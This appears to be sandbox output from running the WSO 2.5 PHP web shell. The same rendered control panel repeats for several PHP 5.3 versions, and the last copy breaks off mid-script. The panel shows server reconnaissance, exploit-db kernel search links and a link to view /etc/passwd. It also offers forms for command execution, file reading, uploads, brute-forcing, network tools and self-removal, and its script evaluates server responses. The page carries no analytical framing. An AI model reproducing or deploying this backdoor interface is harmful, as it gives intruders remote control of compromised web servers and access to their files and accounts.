<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.8 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.7
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.7 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.6
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.6 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.5
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.5 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.4
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else 